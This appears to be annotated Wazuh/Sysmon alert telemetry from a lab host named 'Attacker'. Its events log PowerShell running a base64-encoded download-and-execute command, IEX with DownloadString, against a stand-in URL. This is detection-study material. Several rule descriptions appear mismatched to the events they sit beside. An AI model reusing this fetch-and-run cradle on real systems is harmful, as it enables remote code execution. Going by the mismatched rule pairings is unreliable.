data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:00.5874879Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351089 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:00.548
ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ProcessId: 16768
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_x0prsnfi.525.ps1
CreationUtcTime: 2025-04-24 22:57:00.545
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:00.548 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_x0prsnfi.525.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:00.545 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 139 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535425.2955884 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:03.1389988Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351116 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:01.866
ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ProcessId: 13568
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ParentProcessId: 16768
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:01.866 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 143 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535425.2963955 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:03.4336005Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351117 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:03.394
ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ProcessId: 13568
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_byyqns3s.1z0.ps1
CreationUtcTime: 2025-04-24 22:57:03.394
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:03.394 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_byyqns3s.1z0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:03.394 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 140 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535428.2966724 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:06.0234990Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351150 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:57:04.713
ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ProcessId: 13988
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00}
ParentProcessId: 13568
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:04.713 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13568 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 144 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535428.2974795 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:06.2461871Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351151 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:57:06.240
ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00}
ProcessId: 13988
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3wdrra44.odj.ps1
CreationUtcTime: 2025-04-24 22:57:06.240
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:57:06.240 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1c0-680a-120d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13988 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wdrra44.odj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:57:06.240 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 141 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535431.2977564 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
